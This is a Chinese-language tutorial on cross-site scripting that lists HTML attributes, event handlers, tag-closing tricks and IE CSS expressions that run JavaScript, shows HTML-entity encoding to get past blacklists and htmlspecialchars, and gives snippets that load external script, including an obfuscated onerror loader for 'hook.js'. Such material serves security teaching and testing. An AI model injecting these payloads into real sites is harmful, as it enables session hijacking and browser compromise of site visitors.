一、html可以执行javascript的地方有哪些?
先举个例子比如这个代码
1<a href="$a">f4ck</a>
变量$a可控,怎么让这个代码弹框(执行javascript代码)呢?
(1)属性值引入javascript:[code]伪协议,来执行javascript代码。也就是$a=javascript:alert(1)
只有引用文件的属性才能触发javascript脚本,这些标签有:
href
action
bgsound
background
value
dynsrc
lowsrc。
1<formaction="javascript:alert(1)">
2<input type="text"name="name"value="">
3<input type="submit"value="提交">
4</form>
5<img src="javascript:alert('1');"/>
由于这些属性值不是通用属性,所以会在不同的标签中,如果在火狐上测试不成功请在ie下测试,我用ie6测试是成功的。
(2)"闭合前一个属性值,引入事件驱动属性。事件驱动属性的值是javascript代码,所以可以执行javascript。事件驱动属性是标签的通用属性,所以所有标签都可以用。也就是
1$a="onclick=alert(1)
2这样的事件驱动属性标签还有:
ondblclick
onmousedown
onmouseup
onmouseover
onmousemove
onmouseout
onmousepress
onmousedown
onmouseup
1<a href=""onclick=alert(1)>f4ck</a>
(3)闭合标签,引入<script></scirpt>标签来执行javascript代码。也就是:
1$a="><script>alert(1)</script>
(4)CSS可以通过expression属性执行javascript代码
expression是ie独有的css属性,其目的是为了插入一段javascript代码。
1<pstyle="xss:expression(alert(1))">
在ie6下执行成功。
1@import"http://www.91ri.org/xss.css";
可以从外部导入存在xss代码的css样式。
如果css属性可控,除了可以在expression后面添加javascript代码执行外,还可以像(2)(3)一样通过闭合标签和属性值来达到执行javascript的目的。
乌云上的案例:http://www.wooyun.org/tags/css%E...5%AF%BC%E8%87%B4xss
综上,可以在html里执行javascript的地方有
1、利用javascript:在属性值里2、事件驱动属性3、<script></script>标签中(包括这种形式<scriptsrc="http://www.91ri.org/1.js"></script>)4、CSS中的expression属性中(仅IE)。
二、为什么编码后的代码仍然可以执行?
(1)上面的$a是没被过滤的,但假如被过滤了怎么办,假如只是黑名单过滤了javascript,或者只是对$a进行了htmlspecialchars()转换。执行javascript的地方只进行了html编码。
<a href="$a">f4ck</a>
$a的值
1javascript:alert(1)
$a的值
1javascript:alert(1)
$a的值:
1javascript:alert(1)
以上为html的三种编码。提交后,可以绕过黑名单javascript,进行htmlspecialchars()编码是不会发生任何变化的,那么,这段代码为什么会执行?
因为这个代码,浏览器从头解析当解析到,$a的值时,正常将它解码,就变成javascript:alert(1),然后这个代码在href属性中,所以就执行了。
三、怎么远程加载外部js?
先来说说html标记,html标记其实可以分为两种
1、文本用闭合标签。
例:<h1>f4ck</h1>
2、引用内容用自闭合标签。
例:<img src="http://www.91ri.org/img/bdlogo.gif"/>
浏览器会在html页面加载时,额外向服务器发送请求,注:这里是html标签的特性,不要和同源策略相混淆,同源策略是用来限制浏览器的。
加载进来的js和本域是同源的。
哪些标签可以远程加载外部js,并执行呢?
1、
1<scriptsrc="www.91ri.org/1.js"></script>
2、
1<iframesrc="www.91ri.org/1.js"></iframe>
3、
1<iframesrc=javascript:with(document)0[body.appendChild(document.createElement('script')).src="http://url.cn/1.js"]></iframe>
其实3就是dom的方法创建和插入节点。
1vars=document.createElement("script");
2s.src="http://www.91ri.org/xss.js";
3document.getElementsByTagName("head")[0].appendChild(s);
直接用3用于
viewsource
1<img src='#'onerror=“vara=document.getElementsByTagName('head').item(0);
2varb=document.createElement(String.fromCharCode(115,99,114,105,112,116));
3b.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);
4b.src=‘hook.js';
5a.appendChild(b);">